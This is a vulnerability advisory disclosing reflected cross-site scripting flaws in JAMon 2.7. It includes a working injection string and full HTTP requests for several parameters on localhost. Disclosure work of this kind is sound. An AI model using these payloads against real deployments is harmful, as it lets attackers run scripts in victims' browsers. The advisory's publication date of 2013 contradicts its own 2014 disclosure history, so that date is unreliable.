JAMon 2.7 Cross Site Scripting

`###################################################  
01. ### Advisory Information ###  
  
Title: Multiple Reflected XSS vulnerabilities in JAMon  
Date published: 2013-01-23  
Date of last update: 2013-01-23  
Vendors contacted: JAMon v 2.7  
Discovered by: Christian Catalano  
Severity: Low  
  
02. ### Vulnerability Information ###  
  
CVE reference: CVE-2013-6235  
CVSS v2 Base Score: 4.3  
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
Component/s: JAMon v 2.7  
Class: Input Manipulation  
  
03. ### Introduction ###  
  
The Java Application Monitor (JAMon) is a free, simple, high   
performance, thread safe, Java API that allows developers to easily   
monitor production applications.  
  
http://jamonapi.sourceforge.net  
  
04. ### Vulnerability Description ###  
  
Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been   
identified in the JAMon web application.  
JAMon contains a flaw that allows multiple reflected cross-site   
scripting (XSS) attacks.  
This flaw exists because certain pages do not validate input before   
returning it to users.  
  
+------------------------------+-------------------+  
|-Vulnerable module(s)--------and----parameter(s)--|  
+------------------------------+-------------------+  
|mondetail.jsp --------------------ArraySQL--------|  
|mondetail.jsp --------------------listenertype----|  
|mondetail.jsp --------------------currentlistener-|  
|jamonadmin.jsp -------------------ArraySQL--------|  
|sql.jsp---------------------------ArraySQL--------|  
|exceptions.jsp--------------------ArraySQL--------|  
+------------------------------+-------------------+  
  
05. ### Technical Description / Proof of Concept Code ###  
  
05.01) Malicious Request ("ArraySQL" parameter):  
  
The vulnerability is located in the ' Filter (optional) ' input field   
upon submission to the pages  
  
http://localhost/jamon/mondetail.jsp  
http://localhost/jamon/ jamonadmin.jsp  
http://localhost/jamon/ sql.jsp  
http://localhost/jamon/ exceptions.jsp  
  
The application does not validate the 'ArraySQL' parameter upon   
submission to the *.jsp scripts.  
The attacker can inject the malicious javascript code:  
  
1-->1<ScRiPt >alert('XSS')</ScRiPt><!--  
  
in the ' Filter (optional) ' input field and click on GO! button.  
  
05.02) Malicious Request ("listenertype " parameter)  
  
POST /jamon/mondetail.jsp HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101   
Firefox/22.0 Iceweasel/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/jamon/mondetail.jsp  
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 209  
  
listenertype=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&currentlistener=JAMonBufferListener&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21  
  
  
05.03) Malicious Request ("currentlistener " parameter)  
  
POST /jamon/mondetail.jsp HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101   
Firefox/22.0 Iceweasel/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/jamon/mondetail.jsp  
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 195  
  
listenertype=value&currentlistener=1-->1<ScRiPt>alert('XSS')</ScRiPt><!--&outputTypeValue=html&formatterValue=%23%2C%23%23%23&bufferSize=No+Action&TextSize=&highlight=&ArraySQL=&actionSbmt=Go+%21  
  
06. ### Business Impact ###  
  
This may allow an attacker to create a specially crafted request that   
would execute arbitrary script code in a user's browser within the trust   
relationship between their browser and the server.  
  
07. ### Systems Affected ###  
  
This vulnerability was tested against: JAMon v2.7  
Older versions are probably affected too, but they were not checked.  
  
08. ### Vendor Information, Solutions and Workarounds ###  
  
Currently, there are no known upgrades or patches to correct this   
vulnerability.  
  
09. ### Credits ###  
  
This vulnerability has been discovered by:  
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com  
  
10. ### Vulnerability History ###  
  
October 18th, 2013: Vulnerability identification  
October 22th, 2013: Vendor notification [JAMon]  
December 10th, 2013: Vulnerability confirmation [JAMonI]  
January 23th, 2014: Vulnerability disclosure  
  
11. ### Disclaimer ###  
  
The information contained within this advisory is supplied "as-is" with  
no warranties or guarantees of fitness of use or otherwise.  
I accept no responsibility for any damage caused by the use or misuse of  
this information.  
  
###################################################  
`